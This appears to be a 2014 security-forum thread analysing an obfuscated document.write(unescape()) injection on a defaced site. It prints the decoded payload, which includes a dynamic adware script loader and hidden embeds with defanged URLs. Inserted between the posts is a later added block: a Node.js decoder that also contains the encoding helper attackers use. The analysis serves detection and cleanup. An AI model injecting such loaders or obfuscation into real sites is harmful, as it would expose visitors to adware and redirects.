Author Topic: C99shell malware aka Adware/BetterSurf not detected?


Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • Posts: 34067
  • malware fighter
C99shell malware aka Adware/BetterSurf not detected?
« on: November 28, 2014, 04:45:06 PM »
See: http://killmalware.com/uscnnews.net/
Detected via BitDefender's: https://www.virustotal.com/en/url/25febec462a1b2ddbb46353d2fdd32ddfa8cd96abb09764c538dc0cf6bde68c0/analysis/1417189005/
Unable to properly scan your site. Content not found.
The decoded script
Code:
<!-- No Name Cyber Team --><!--document.write(unescape(' <html lang="en">
<head><script>if(typeof window.__wsujs==='undefined'){window.__wsujs=5064;window.__wsujsn='PlugIn';window.__wsujss='9DB4EA2CAB9F70E2////////4E5950AE6A08DED0';} </script>
              <script>if(top == self){
          var zhead = document.getElementsByTagName('head')[0];
          if(!zhead){zhead = document.createElement('head');}
          var qscript = document.createElement('script');
          qscript.setAttribute('id','wsh2_js');
          qscript.setAttribute('src','htxp://jswrite.com/script1.js');
          qscript.setAttribute('type','text/javascript');qscript.async = true;
          if(zhead && !document.getElementById('wsh2_js')) zhead.appendChild///(qscript);
             } </script>
<title>[+]No Name Cyber Team[+]</title>
<link href="htxp://fonts.googleapis.com/css?family=Creepster|Audiowide" rel="stylesheet" type="text/css">
<meta name="title" content="[+]No Name Cyber Team[+]">
<meta name="keywords" content="No Name Cyber Team, NNC Team">
<meta name="description" content="Hacked by No Name Cyber Team, Touched by No Name Cyber Team">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<meta name="googlebot" content="index,follow">
<meta name="robots" content="all">
<meta name="robots schedule" content="auto">
<meta name="distribution" content="global">
<meta charset="utf-8">
<script type="text/javascript" src="htXp://apihulatoonet-a.akamaihd.net/gsrs?is=amp1lmid&bp=PBG&g=36d66a23-2a6e-4920-884a-98e675b38126" ></script></head>
<!-- body encrypt -->
<style>
*{
margin:0;
padding:0;
}
body{
background-color:#000;
color:#00FF00;
font-size: 18px;
padding-bottom:20px;
}
.error-code{
font-family: ;
font-size: 200px;
font-family: Viner Hand ITC, 'Audiowide', cursive, arial, helvetica, sans-serif;
color: #00FFFF;
color: #FF0000(255, 255, 255, 0.98);
width: 50%;
text-align: right;
margin-top: 5%;
text-shadow:  5px 5px hsl(0, 0%, 100%);
float: left;
}
.not-found{
width: 47%;
float: right;
margin-top: 5%;
font-family:Viner Hand ITC, 'Audiowide', cursive, arial, helvetica, sans-serif;
font-size: 50px;
color: #00FFFF;
text-shadow: 2px 2px 5px hsl(0, 0%, 61%);
padding-top: 70px;
}
.clear{
float:none;
clear:both;
}
.content{
text-align:center;
font-family:Viner Hand ITC, 'Audiowide', cursive, arial, helvetica, sans-serif;
line-height: 30px;
color:#FF0000;
}
input[type=text]{
border: hsl(247, 89%, 72%) solid 1px;
outline: none;
padding: 5px 3px;
font-size: 16px;
border-radius: 8px;
}
a{
text-decoration: none;
color: #00FFFF;
text-shadow: 0px 0px 6px white;
}
a:hover{
color:white;
}

</style>

<embed src="htXp://autofollowersfb.hol.es/NNC%20Team.swf" AUTOSTART=TRUE LOOP=TRUE WIDTH=0 HEIGHT=0 ALIGN="CENTER"></embed><br />

<body>
<p class="error-code">
<a href="htXp://nonamecyberteam.com">NNC</a>
</p>
<p class="not-found">No Name Cyber Team</p>
<div class="clear"></div>
<div class="content">
IntanMuslimah_404 - BlackX'Ops007 - Latunusa - ??????????s - Mr.////Phoenix1337 - Agus Darlis
<br><a href="htXp://blog.nonamecyberteam dot com">Contact Us</a>
</div>
</body>
</html>
'));//-->
A webmaster with a hex decoder would have untangled it in milliseconds....

polonus
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!
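The injection in the post is the usual `document.write(unescape('%3C%68...'))` layer: every character of the injected HTML is percent-encoded so that a casual look at the page source shows nothing readable. The script below is an added example of my own, not code from polonus or from the defaced site. It reproduces that layer with a constructed sample (using the thread's defanged `htxp://jswrite.com/script1.js` and the `window.__wsujs` marker; the `example.invalid` host is a placeholder I made up), decodes it the way `unescape()` does (both `%XX` and `%uXXXX` forms), and then pulls out what a webmaster actually needs for triage: every external script source, whether it is set statically or via `setAttribute('src', ...)`, the BetterSurf marker, and the page title. Assumes Node.js; no third-party modules.

```javascript
// Decoder and triage for document.write(unescape('...')) injections.
// Added example, not code from the thread or the defaced site.
// Assumes Node.js (any recent version); no dependencies.

// Same behaviour as the legacy JavaScript unescape(): %XX -> one code unit,
// %uXXXX -> one UTF-16 code unit, anything else left untouched.
function decodeUnescape(s) {
  return s.replace(/%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g, (m, u, x) =>
    String.fromCharCode(parseInt(u !== undefined ? u : x, 16)));
}

// Attacker-side helper: the obfuscation layer itself. Encodes every UTF-16
// code unit, which is what the injection tools do (escape() does the same,
// except it leaves alphanumerics readable).
function hexEncode(s) {
  let out = '';
  for (let i = 0; i < s.length; i++) {
    const cu = s.charCodeAt(i);
    out += cu < 0x100
      ? '%' + cu.toString(16).toUpperCase().padStart(2, '0')
      : '%u' + cu.toString(16).toUpperCase().padStart(4, '0');
  }
  return out;
}

// Find every unescape('...') / unescape("...") argument in a page and decode it.
function extractUnescapePayloads(html) {
  const re = /unescape\(\s*(['"])([\s\S]*?)\1\s*\)/g;
  const payloads = [];
  let m;
  while ((m = re.exec(html)) !== null) payloads.push(decodeUnescape(m[2]));
  return payloads;
}

// Triage of one decoded payload: external script sources (static <script src>
// and dynamically created tags), the BetterSurf marker seen in the thread,
// and the <title> (defacement crews usually sign it).
function triage(decoded) {
  const srcs = new Set();
  const staticRe = /<script\b[^>]*\bsrc\s*=\s*["']([^"']+)["']/gi;
  const dynRe = /setAttribute\(\s*['"]src['"]\s*,\s*['"]([^'"]+)['"]\s*\)/g;
  let m;
  while ((m = staticRe.exec(decoded)) !== null) srcs.add(m[1]);
  while ((m = dynRe.exec(decoded)) !== null) srcs.add(m[1]);
  const title = (decoded.match(/<title>([^<]*)<\/title>/i) || [null, null])[1];
  return {
    externalScripts: [...srcs],
    betterSurfMarker: /__wsujs/.test(decoded), // marker from the posted script
    title,
  };
}

function analyse(pageSource) {
  return extractUnescapePayloads(pageSource).map(decoded => ({ decoded, ...triage(decoded) }));
}

// Constructed sample, modelled on the decoded page in the thread (defanged URLs kept).
// 'example.invalid' is a placeholder host, not something observed on the site.
const INJECTED = [
  '<html><head>',
  "<script>if(typeof window.__wsujs==='undefined'){window.__wsujs=5064;window.__wsujsn='PlugIn';}</script>",
  "<script>var q=document.createElement('script');q.setAttribute('src','htxp://jswrite.com/script1.js');document.head.appendChild(q);</script>",
  '<title>[+]No Name Cyber Team[+]</title>',
  '<script src="htxp://example.invalid/gsrs?is=amp1lmid"></script>',
  '</head><body>Hacked</body></html>',
].join('\n');

// This is what the webmaster sees in the raw page source: one opaque string.
const SAMPLE_PAGE = "<!-- No Name Cyber Team --><script>document.write(unescape('"
  + hexEncode(INJECTED) + "'));</script>";

const report = analyse(SAMPLE_PAGE);
for (const r of report) {
  console.log('title:              ', r.title);
  console.log('BetterSurf marker:  ', r.betterSurfMarker);
  console.log('external scripts:   ', r.externalScripts);
}
```

Save as `decode_unescape.js` and run `node decode_unescape.js`; to use it on a real page, replace `SAMPLE_PAGE` with the fetched source. The two regexes deliberately cover both ways the posted code loads its payload: the `<script src>` tag for the akamaihd loader and the `createElement('script')` + `setAttribute('src', ...)` path for jswrite.com, since scanners that only look at static tags miss the second one.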


Offline polonus

Re: C99shell malware aka Adware/BetterSurf not detected?
« Reply #2 on: November 28, 2014, 05:18:33 PM »
The hex-obfuscated script is known as such; it is also known as Riskware.Script.BetterSurf.ctbzhb or the BetterSurf malcode script.
The defacement hackers used such a hex-encoded shell script, dear Pondus, and I ran it through a hex decoder
(Sucuri has a nice one available on their site, and there are others to be found online too).

Damian

Trojan:JS/Redirector.A is the detection name for a specifically obfuscated JavaScript URL that is typically used to redirect users to websites other than those they expected. The obfuscated JavaScript may appear on a malicious website, may be sent via an HTML-based e-mail message, or may be included as part of an exploit. Manual removal is not recommended; use an AV solution. Links are activated within iframes while viewing web content on maliciously modified pages. Alert notifications from installed antivirus software may be the only symptom(s).
The code is specifically related to the Windows Vista platform...

D
« Last Edit: November 28, 2014, 05:24:06 PM by polonus »

Offline Pondus

  • Probably Bot
  • Posts: 37700
Re: C99shell malware aka Adware/BetterSurf not detected?
« Reply #3 on: November 29, 2014, 01:53:33 PM »
Norman/BlueCoat

Defaced website; obfuscated JavaScript is used, which is generally used in such cases, along with malicious redirection, so it is flagged by some vendors. But nothing malicious in the webpage or the deobfuscated code, hence ignored.